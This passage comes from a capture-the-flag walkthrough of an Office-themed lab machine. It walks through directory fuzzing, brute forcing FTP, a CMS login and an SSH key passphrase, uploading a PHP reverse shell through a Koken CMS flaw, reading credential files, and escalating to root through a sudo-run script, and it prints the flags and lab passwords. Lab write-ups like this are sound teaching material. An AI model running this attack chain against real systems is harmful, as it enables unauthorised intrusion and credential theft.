Step 4: Subdomain Enumeration and Directory Busting
 

Next, we run a subdomain enumeration tool (gobuster) on the web server to look for hidden directories and files. This often reveals sensitive files or configurations that can be exploited.
 

Command:

sudo gobuster dir -u http://10.0.2.7 -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -o dir-80.log
 

Explanation:
 

gobuster: A directory and file brute-force tool.
 

-u: Specifies the URL to scan.
 

-x: Specifies file extensions to search for.
 

--wordlist: Uses a wordlist to guess directory names.
 

(Click to enlarge)

Result:
 

This scan uncovers several directories of interest:
 

/robots.txt

/nick

/staffblog
 

Exploring Directories:
 

In /robots.txt, we find some disallowed paths that could provide further clues.

In /nick, we find two files: farewell.txt and nick.pcap. The .pcap file will be important for further analysis.
 

(Click to enlarge)

Exploring Directories (Continued):
 

The content of the 'farewell.txt' give us a potential clue to find the next flag.
 

(Click to enlarge)

Step 5: FTP Server Access and Wireshark Analysis
 

At this point, we focus on analyzing the .pcap file (nick.pcap) from the /nick directory. We use Wireshark to inspect the packet capture for any sensitive information such as login credentials.

Explanation:

Wireshark is a network protocol analyzer that captures and displays packets in real-time. We use it here to inspect the .pcap file for FTP credentials.
 

Command (Opening Wireshark):

sudo wireshark open nick.pcap
 

(Click to enlarge)

Result:
 

Following the TCP stream in Wireshark, we find FTP login credentials:
 

Username: creed

Password: creed
 

(Click to enlarge)

Result:
 

Following the TCP stream in Wireshark, we find FTP login credentials:
 

Username: creed

Password: creed
 

In '/staffblog' we find the file "CreedThoughts.doc", which gives us our 3rd flag!

FLAG #3:

FLAG3: 50f1ff7bc72bb24c0082be83a8b8c497
 

(Click to enlarge)

In the previous slide we uncovered a hint that the password to gain access to the FTP server is going to be "creed" with three digits added to the end to make it more "safe".

We can do this a multitude of ways, however, there is a tool that has been created for this specific purpose called "creedGEN". This tool will generate a wordlist that can then be used in a brute force attack to gain entry to the FTP server with a brute force entry tool such as "hydra".

Download and run creedGEN:

sudo git clone https://github.com/BBennett92/creedGEN
cd creedGEN
sudo python3 creedGEN.py
 

(Click to enlarge)

Once we have generated the wordlist, we can use it with the tool "hydra" to gain access to the FTP server via brute force entry using the following command.
 

Explanation:
 

Hydra is a parallelized login cracker that supports numerous protocols.
 

-l creed: Specifies the username.
 

-P creedPWNlist.txt: Uses the generated wordlist file.
 

ftp: Specifies the FTP service to attack.

Command:

hydra -l creed -P creedPWNlist.txt 10.0.2.7 ftp
 

(Click to enlarge)

Now that we have credentials, we can log into the FTP server (port 21).
 

Command (FTP Login):

ftp 10.0.2.7
 

After logging in, we find two files: archive.zip and reminder.txt. The reminder.txt file hints that the password for archive.zip is related to a joke from the episode "WUPHF.com" (Season 7, Episode 9). We deduce the password is "bigboobz".

Explanation:

This command extracts the contents of the ZIP file using the unzip utility in Linux.
 

Command (Unzipping Archive):

sudo unzip archive.zip


FLAG #4:

FLAG4: 4955cbee5a6a5a48ce79624932bd1374
 

(Click to enlarge)

(Click to enlarge)

Step 6: Exploiting Koken CMS via Port 18888
 

Next, we turn our attention to port 18888, where a content management system (CMS) called Koken is running. We use ffuf to perform a fuzzing attack to enumerate directories on this port.

Explanation:
 

ffuf: A fast web fuzzer used to find hidden directories and files on web servers.
 

-c: Enables colorized output.
 

-w: Specifies the wordlist to use for fuzzing.
 

-u: URL to fuzz (FUZZ acts as a placeholder for the directories).
 

-of html: Sets the output format to HTML.
 

-o dir-18888.html: Saves the results to a file named dir-18888.html.
 

-fs 0: Filters out responses based on the size of the HTTP response.
 

Command (Fuzzing Port 18888):

sudo ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://10.0.2.7:18888/FUZZ" -of html -o dir-18888.html -fs 0
 

(Click to enlarge)

Result:
 

We discover the Koken CMS admin login page at http://10.0.2.7:18888/admin/. Using the information found in the extracted email (archive.zip), we try Angela’s credentials. We know her email is angela@dundermifflin.com, and we brute force the password using the names of her 13 cats from The Office.

Using BurpSuite, we automate the login attempts, trying different cat names.
 

Angela's cats names (Dunderpedia):

https://theoffice.fandom.com/wiki/Angela%27s_cats
 

(Click to enlarge)

We need to utilize the proxy in Burp Suite to bypass any possible lockouts for failed login attempts. First, we will need to open the browser in Burp Suite, navigate to the Koken CMS admin login page, enter Angela's email address and enter any password for now so we can send the request to Intruder using the feature in "Intercept".
 

(Click to enlarge)

After capturing the traffic using "Intercept", we need to highlight the fields we are trying to use the "Sniper" attack type payloads on, right click them, and send them too the "Intruder" tool in Burp Suite.
 

(Click to enlarge)

Then, we must highlight the captured password field in "Intruder", right click it once more, send it to "Intruder" again, switch over to the "Payloads type", then start to build the payload we can either make a list of the names in a text document and load it, or add each cat name to our payload list using the "Add" function. We can then start the attack.
 

(Click to enlarge)

It returns a "302" status on the password "Crinklepuss" instead of the "404" error on the other possible combinations. We can now access the Koken server using our aquired login credentials!
 

Credentials (Admin Login):
 

E-mail: angela@dundermifflin.com

Password: Crinklepuss

(Click to enlarge)

Success! After entering the correct login credentials, we can access the Koken CMS using Angela's credentials.
 

(Click to enlarge)

By switching over to the “Settings” tab in the Koken CMS, we can find what version it is running to see if we can find any possible exploits we can use to escalate our privileges. The Koken CMS is running version “0.22.24”.

After a quick Google search we find that we can upload an image containing a reverse . php shell found on the exploit data base below:

https://exploit db.com/explots/48706
 

(Click to enlarge)

(Click to enlarge)

Step 7: Establishing a Reverse Shell Using Netcat
 

After gaining access to the Koken CMS, we upload a reverse shell disguised as an image file using a vulnerability in the file upload feature.
 

Create a PHP reverse shell using a text editor like nano:

nano newshellpic.php
 

Command (Creating PHP Reverse Shell):
 

Explanation:
 

This simple PHP shell connects back to our machine on port 1234 using the bash shell.

(Click to enlarge)

In interceptor, we need to delete the ".jpg" off both instances of the fake image we just uploaded "newshellpic.php.jpg"
and change it to "newshellpic.php", then click the "Forward" button until all of the traffic is sent through interceptor.
Then we can turn Interceptor off and call back to our PHP reverse shell with "netcat".
 

(Click to enlarge)

Once, we have established a connection using the following "netcat" command.

Command:

nc -nvlp 1234
 

Explanation:
 

nc (Netcat): Opens a network connection.
 

-nvlp 1234: Opens a listener on port 1234.

(Click to enlarge)

Step 8: Scanning the Database to Find the 2nd Flag and Credentials
 

Navigate to the "/var/www/html2/secret" directory. Using the reverse shell, explore the file system to locate the second flag.

Commands:
 

cd /var/www/html2/secret
cat index.html.bak
 

Explanation:
 

cd /var/www/html2/secret: Navigate to the secret directory.
 

cat index.html.bak: Displays the contents of the index.html.bak file.

Result:

This will reveal the 2nd flag.

Next, head to the Koken CMS configuration directory to retrieve the credentials for Toby Flenderson.

Commands:
 

cd /var/www/koken/storage/configuration

cat database.php
 

Explanation:
 

cat database.php: Reads the configuration file to reveal sensitive database information.

Result:
 

Username: kokenuser

Password: Toby!Flenderson444

FLAG #2:

FLAG2: 0a9025f72493da059a26db3acb0e2c42
 

(Click to enlarge)

Step 9: Using ExifTool to Analyze the Three Images for Metadata
 

Download the three images from the Koken CMS, and use ExifTool to extract metadata from the images to compare and analyze them.
 

exiftool image1.jpg
exiftool image2.jpg
exiftool image3.jpg
 

Explanation:
 

ExifTool: A command-line application used to read, write, and manipulate image metadata.

(Click to enlarge)

Compare the metadata between the images to discover the hidden clues and the 6th flag. The metadata might include file creation dates, hidden comments, or encoded data that leads to the next step.

Here we find both the 6th flag, as well as our next clue. It’s a command to unlock the locked ports we found earlier.

Step 10: Using Knock to Unlock the SSH Port
 

Now that you've extracted metadata, the next step is to unlock the SSH port (Port 22) using a port-knocking technique. The metadata reveals a sequence of ports to "knock" on in order to open the SSH port.
 

Use the Knock tool with the port sequence obtained from the metadata:

knock 10.0.2.7 5000 7000 9000
 

Explanation:
 

knock: A port-knocking tool that sends packets to specific ports in a sequence.
 

The target machine listens for the sequence and opens port 22 when the correct pattern is detected.

Once the knock sequence is successful, SSH port 22 will be unlocked, and you can proceed to brute force the SSH login.

FLAG #6:

FLAG6: c9db6b7cad326cab2bcf0d2a26f7832d

(Click to enlarge)

Step 11: Brute Forcing the SSH Private Key Using JohnTheRipper
 

Convert Michael's SSH private key using the SSH2John tool to create a hash that can be cracked by JohnTheRipper.

It can be found at the GitHub repository:

https://github.com/openwall/john/blob/bleeding jumbo/run/ssh2john.py

Then use a text editor such as “nano” and copy, paste, and save the script as python file.

Command:

sudo nano ssh2john.py

Then move Michael’s SSH private key “michael” into the same directory of the “ssh2john.py” using the “sudo mv michael” command, followed by the location of the directory such as below:

Command:

sudo mv michael /home/madhatter/Desktop/tools/ssh2john/

Command:

sudo python3 ssh2john.py michael | tee michael-hash
 

Explanation:
 

Converts the private SSH key into a format that JohnTheRipper can understand.

After, we can run the following command to get the hash value of the SSH private key, make sure the command is run in the same directory as both the “ssh2john.py” script and “michael” SSH private key:

Command:

sudo python3 ssh2john.py michael | tee michael-hash
 

(Click to enlarge)

We can then use "JohnTheRipper" to pass the hash we just produced from the private key.

Command:

sudo john michael-hash -wordlist=/usr/share/wordlists/rockyou.txt
 

Explanation:
 

Uses a wordlist to brute-force the passphrase.

After obtaining the passphrase, change the permissions of the private key and log in via SSH.

Command:

chmod 600 michael
 

(Click to enlarge)

Command:

ssh -i michael michael@10.0.2.7

After getting access, we can use “ls -la” to list all files and hidden directories.

Command:

ls -la
 

(Click to enlarge)

Step 12: Spawning an Interactive Shell and Finding the 7th Flag
 

Once logged in as Michael via SSH, you need to spawn an interactive shell for more control.
 

Use Python to spawn an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
 

Explanation:
 

This command spawns a fully interactive TTY shell, which allows us to use more commands seamlessly.

The 7th flag is found after we “cat” the text file “.sus.txt”.

Command:

cd /home/michael
cat .sus.txt

FLAG #7:

FLAG7: 76a2ecd19b04acb89b7fe8c3d83296df
 

(Click to enlarge)

After gaining access and using the “ls” command, there happens to be a movie script titled: "THREAT LEVEL MIDNIGHT"

While this "movie script" is not directly related to the flags, it is a funny Easter egg that can be explored.
 

(Click to enlarge)

Step 13: Logging Into MySQL Using Toby's Credentials to Find the 5th Flag
 

When checking the sudo permissions, we find that we can execute a script as all users.

Command:

sudo -l

Now that you have the MySQL credentials for Toby Flenderson, log into the MySQL server to locate the 5th flag.
 

Log into MySQL using the credentials retrieved earlier:

mysql -u kokenuser -p -D kokendb
 

Explanation:
 

-u kokenuser: Specifies the MySQL username.
 

-p: Prompts for a password.
 

-D kokendb: Specifies the database to use.

When prompted, enter the password:

Toby!Flenderson444
 

(Click to enlarge)

Select the flag table and retrieve the 5th flag.

Select the flag table and retrieve the 5th flag:

show tables;
select * from flag

;
 

Explanation:
 

SHOW TABLES;: Lists all the tables in the kokendb database.
 

SELECT * FROM flag;: Selects all records from the flag table.

This will output the 5th flag.

FLAG #5:

FLAG5: d2d1b5f66d0e00b35fe2bdee7ffcb398
 

(Click to enlarge)

After exiting the MySQL database, we can navigate to the directory “/home/creed/” using the following command.

Command:

cd /home/creed/

Then using the command "ls -al" we can see what is in this directory.
 

(Click to enlarge)

Step 14: Finding and Altering the vsftpd.conf File
 

To allow the execution of your defuse.sh script, you must modify the vsftpd.conf file on the target machine to enable file permission changes.

Before we do so, we need to find the configuration file "vsftpd.conf ". This is a file used by the VSFTPD (Very Secure FTP Daemon) server, which is a popular FTP server software for Unix like systems. This file contains various settings and parameters that control the behavior and functionality of the FTP server. We must make sure we are able to make our “defuse.sh” script executable after we upload it too the FTP server.

We can find this configuration file in the following directory using the following command.

 

Locate the vsftpd.conf file:

ls -l vsftpd.conf


After finding the correct directory, we are able to navigate to it using the following command.

Command:

“cd /etc/"

Then we can open and edit the configuration file using the command.

Command:

"nano vsftpd.conf"
 

(Click to enlarge)

At the bottom of the configuration file, we find that the "chmod_enable =NO” is restricting us from changing file permissions. We need to edit this to "chmod_enable =YES” to allow our "defuse.sh" script to be allowed to be changed into an executable script after we upload it to the FTP server.
 

(Click to enlarge)

Step 15: Uploading the defuse.sh Script and Making it Executable
 

After modifying the vsftpd.conf file, the next step is to upload and execute the defuse.sh script using lftp. Now that we can change permissions, we can create our "defuse.sh" script using a text editor such as "nano" or "vim" using the following command.

Command:

sudo nano defuse.sh

Then input the following bash script:

#!/bin/bash
bash -i
 

(Click to enlarge)

Login to the FTP server using lftp:

lftp -u creed,creed223 10.0.2.7
 

Explanation:
 

Logs into the FTP server using lftp.

This script will start a new interactive Bash shell session within our existing shell session.

Then the following command to place the “defuse.sh” script on the FTP server.

Command:

put defuse.sh

Finally, we can change the scripts permissions to an executable using the command below.

Command:

chmod +x defuse.sh

Moving back to the SSH server, we can execute our “defuse.sh” script to gain root privileges using the following command.

Command:

sudo -u root /home/creed/defuse.sh
 

(Click to enlarge)

Using the "id" command, we can display the user and group identity information for the current user.

Command:

id

Then we can use the "cd" command to change our directory into the root directory using:

Command:

cd /root

Using “ls”, we find our 8th flag is in the root directory, using the command “cat flag.txt” we capture our final flag.

Commands:

ls
cat flag.txt
 

Explanation:
 

cd /root: Changes directory to root.
 

cat flag.txt: Displays the contents of the flag file.

FLAG #8:

FLAG8: ebadbecff2429a90287eled98960e3f6


Success!
 

(Click to enlarge)